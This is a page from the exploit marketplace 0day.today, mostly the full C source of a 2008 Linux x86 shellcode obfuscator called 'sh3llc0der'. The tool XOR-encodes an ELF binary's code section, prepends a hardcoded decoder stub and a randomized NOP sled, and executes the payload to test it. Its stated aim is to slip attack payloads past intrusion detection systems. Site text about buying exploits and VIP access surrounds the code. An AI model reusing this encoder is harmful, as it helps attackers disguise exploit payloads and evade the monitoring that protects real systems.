0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
linux x86 shellcode obfuscator
[==============================
linux x86 shellcode obfuscator
==============================
/*
* sm4x - 2008 => sm4x0rcist [a7] gmail [d07] com
* - sh3llc0der.c v0.1 (beta)
* - (elf binary) shellcode encryptor, NULL free for IDS payload bypassing
* - key is a simple int for x(x(p)) decryption(encryption(p)) (modify to add/subtract if needed)
* - if you find bugs i dont wanna know -> fix them and its urs
* - watch for 0x0a, 0x0d warnings for \r\n as they get mucked in most str** calls
*
* nb: nasm ur files with -felf, then ld -o them (u know)
* usage: ./sh3llc0der [options] binaryfile
* - output is a encoded byte array (or raw binary if -o <file> is specified)
* - it was easier for me to write it directly hooking to the elf struct -> but you can change it (only took 3 hours so ITS BUGGY!)
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <time.h>
#include <string.h>
#include <linux/elf.h>
char decoder[] = "\xeb\x10\x5e\x31\xc9"
"\xb1\x00\x80\x74\x0e" // \x00 location of payload size
"\xff\x00\xfe\xc9\x75" // \x00 location of xor key
"\xf7\xeb\x05\xe8\xeb"
"\xff\xff\xff";
int getkey(int i) {
int seed;
struct timeval tm;
gettimeofday(&tm, NULL);
seed = tm.tv_sec + tm.tv_usec; srandom(seed);
return (random() % i) +1;
}
void usage() {
printf("Usage: sh3llc0der [options] shellcode\n");
printf("\tv - verbose\n");
printf("\to [outfile] - out file (stdout is default)\n");
printf("\tn [size] - generate with NOP sled of size length (minus decoder)\n");
printf("\tr - randomize NOP sled with other operations\n");
printf("\t? - this crud\n");
}
int main(int argc, char **argv) {
Elf32_Ehdr elfhdr; Elf32_Phdr dataseg; Elf32_Phdr txtseg;
int found_txt_seg = 0; int i = 0; int r = 0; int len = 0; int key = 0;
int include_noop_instructions = 0; int noop_length = 0; int use_nop_randomization = 0;
int write_file = 0; int is_verbose = 0;
unsigned char c; unsigned char *b = NULL; unsigned char *nb = NULL;
char *upayload = NULL; char *outfile = NULL;
unsigned int payload_offset = 0; unsigned int payload_size = 0;
int (*func)();
opterr = 0; int option = 1;
while((option = getopt(argc, argv, "vrn:o:?")) != -1 ) {
switch(option) {
case 'v':
is_verbose = 1;
break;
case 'o':
write_file = 1;
outfile = optarg;
if(outfile != NULL) { printf("[+] writing shellcode to: %s\n", outfile); }
break;
case 'n':
if(optarg != NULL) noop_length = atoi(optarg); else break;
include_noop_instructions = 1;
break;
case 'r':
use_nop_randomization = 1;
break;
case '?':
usage(); exit(0);
break;
default:
// nothing
break;
};
}
if(argc < 2) { usage(); exit(0); }
printf("[+] sh3llc0der - sm4x 2008\n");
upayload = argv[argc-1]; if(upayload == outfile) { printf("[-] ummm no\n"); usage(); exit(-1); }
if(is_verbose) { printf("[?] opening %s\n", upayload); }
FILE *p = fopen(upayload, "rb");
if(p == NULL) { printf("[-] null file - nice try\n"); exit(-1); }
fseek(p, 0, SEEK_END);
len = ftell(p); rewind(p);
if(len <= 0) { printf("[-] 0 len file - nice try\n"); exit(-1); }
/* adjust our noop length for the decoder size */
if(include_noop_instructions && noop_length > sizeof(decoder)) { noop_length -= sizeof(decoder); }
printf("[+] shellcode length: %d Bytes\n", len);
b = (char *) malloc(sizeof(char)*len);
if(b == NULL) { printf("[-] unable to buffer shellcode - nice try again!\n"); exit(-1); }
if(is_verbose) { printf("[?] reading %s....\n", upayload); }
r = fread(b, 1, len, p);
if(r != len) { printf("[-] **warning** - unable to load the entire file into buffer!\n"); }
fclose(p); p = NULL;
if(is_verbose) { printf("[?] file %s seems ok with %d size\n", upayload, len); }
/* get our ELF header out of the binary */
memcpy(&elfhdr, (void *)b, sizeof(Elf32_Ehdr));
printf("[+] Starting address: 0x%x\n", elfhdr.e_entry);
/* seek to our offset */
printf("[+] Offset @ 0x%x\n", elfhdr.e_phoff);
/* loop for seg offset (you're gonna crash here if its not a proper elf binary -> don't really care!! lol) */
for(i = 0;i < elfhdr.e_phnum; i++) {
/* copy in our txtseg what we think* to be the appropriate header (p_offset == 0 means text) */
memcpy(&txtseg, &b[(sizeof(Elf32_Ehdr)) + (i * sizeof(Elf32_Phdr))], sizeof(Elf32_Phdr));
if(txtseg.p_filesz > 0 && txtseg.p_offset == 0) {
printf("[+] .text segment found, len: 0x%x|0x%x @ V:0x%x P:0x%x off: 0x%x\n",
txtseg.p_filesz, txtseg.p_memsz, txtseg.p_vaddr, txtseg.p_vaddr, txtseg.p_offset);
found_txt_seg = 1; break;
} else {
found_txt_seg = 0;
}
} if(!found_txt_seg) { printf("[-] could not find .text segment for encoding!\n"); exit(-1); }
/* calculations for start of .text with offset (usually 0) */
payload_size = (txtseg.p_vaddr + txtseg.p_filesz) - elfhdr.e_entry;
payload_offset = (txtseg.p_offset + txtseg.p_filesz) - payload_size;
printf("[+] calc offset: 0x%x | 0x%x -> (SHELLCODE SIZE: %d Bytes)\n", payload_offset, payload_size, payload_size);
int new_payload_size = noop_length+payload_size+sizeof(decoder)-1;
nb = (char *) malloc(sizeof(char) * new_payload_size);
if(nb == NULL) { printf("[-] error creating copy payload - nice try\n"); exit(-1); }
memset(nb, 0x0, sizeof(char) * new_payload_size); // just in case - clean it out
// ensure we have a NULL free xor'd shellcode -> keep trying until we do
int is_null = 0; int warn = 0; int attempts = 0;
while(1) {
if(attempts > 20) { printf("[-] somthing is very wrong!! please check the binary\n"); exit(-1); }
key = getkey(255);
for(i = 0; i < payload_size; i++) {
c = b[payload_offset+i]; c ^= key;
if(c == 0x00) { printf("[!] ERR: 0x%x on key: %d\n", b[payload_offset+i], key); is_null = 1; break; }
if(c == 0x0a || c == 0x0d) { printf("[!] WARN: 0x%x on key: %d\n", b[payload_offset+i], key); warn =1; }
} attempts++;
if(is_null) { printf("[-] NULL found.. regenerating now... try=%d\n", attempts); is_null = 0; usleep(100); continue; }
if(warn) { printf("[!] WARN: invalid hex was found in this shellcode -> this may* not pass some string functions!\n"); }
if(is_verbose) { printf("[?] running xor-enc on payload now (key=%d @ %x attempts)...\n", key, attempts); }
/* fill our new buffer -nb*/
for(i = 0; i < payload_size; i++) {
nb[noop_length+sizeof(decoder)-1+i] = b[payload_offset+i];
if(is_verbose) { printf("\\x%.2x", b[payload_offset+i]); }
nb[noop_length+sizeof(decoder)-1+i] ^= key;
} break;
} if(is_verbose) { printf("\n"); }
if(!warn) { printf("[+] done xor-enc on payload (NULL FREE)...\n"); } else { printf("[!] (check warnings!!) some problems with xor-enc (NULL FREE)...\n"); }
for(i = 0; i < noop_length+payload_size-1; i++) printf("\\x%.2x", nb[sizeof(decoder)+i]);
/* we need to set our primary instructions to decode with xor */
decoder[6] = payload_size; decoder[11] = key;
printf("\n");
if(include_noop_instructions) {
printf("[+] prepending %d (%d = minus decoder len) NOOPs...\n", noop_length+sizeof(decoder), noop_length);
// minus the decoder size
if(use_nop_randomization) {
for(i = 0; i < noop_length; i++) {
int p = getkey(5);
// hardly random - but change to modify the primary sled sig
switch((int)p) {
case 1: nb[i] = 0x90; break;
case 2: nb[i] = 0x40; nb[i+1] = 0x48; i++; break;
case 3: nb[i] = 0x50; break;
case 4: nb[i] = 0x58; break;
case 5: nb[i] = 0x99; break;
default: nb[i] = 0x90; break;
};
}
} else {
for(i = 0; i < noop_length; i++) nb[i] = 0x90;
}
}
printf("[+] adding decoder of %d Bytes (total= %d Bytes)...\n", sizeof(decoder), sizeof(decoder)+payload_size);
memcpy(nb+noop_length, decoder, sizeof(decoder)-1);
for(i = 0; i < noop_length+payload_size+sizeof(decoder)-1; i++) printf("\\x%.2x", nb[i]);
printf("\n");
if(write_file) {
printf("[+] writing payload to: %s\n", outfile);
FILE *w = fopen(outfile, "wb");
if(w == NULL) { printf("[-] Unable to open file: %s\n", outfile); goto continue_test; }
int bytes = fprintf(w, nb, sizeof(decoder)+payload_size, 0);
fclose(w);
printf("[+] done %d written.\n", bytes);
}
continue_test:
printf("[+] testing payload now ...\n");
printf("[-] if shellcode tests bad something has gone horribly wrong - do NOT continue with payload...\n");
/* if this mashes out ie: seg fault -> then DO NOT use the shellcode on an exploit -> ur gonna crash the shit */
func = (int (*)()) nb;
(int)(*func)();
// should never get here really
cleanup:
if(p != NULL) fclose(p);
return 0;
}
# 0day.today [2024-11-16] #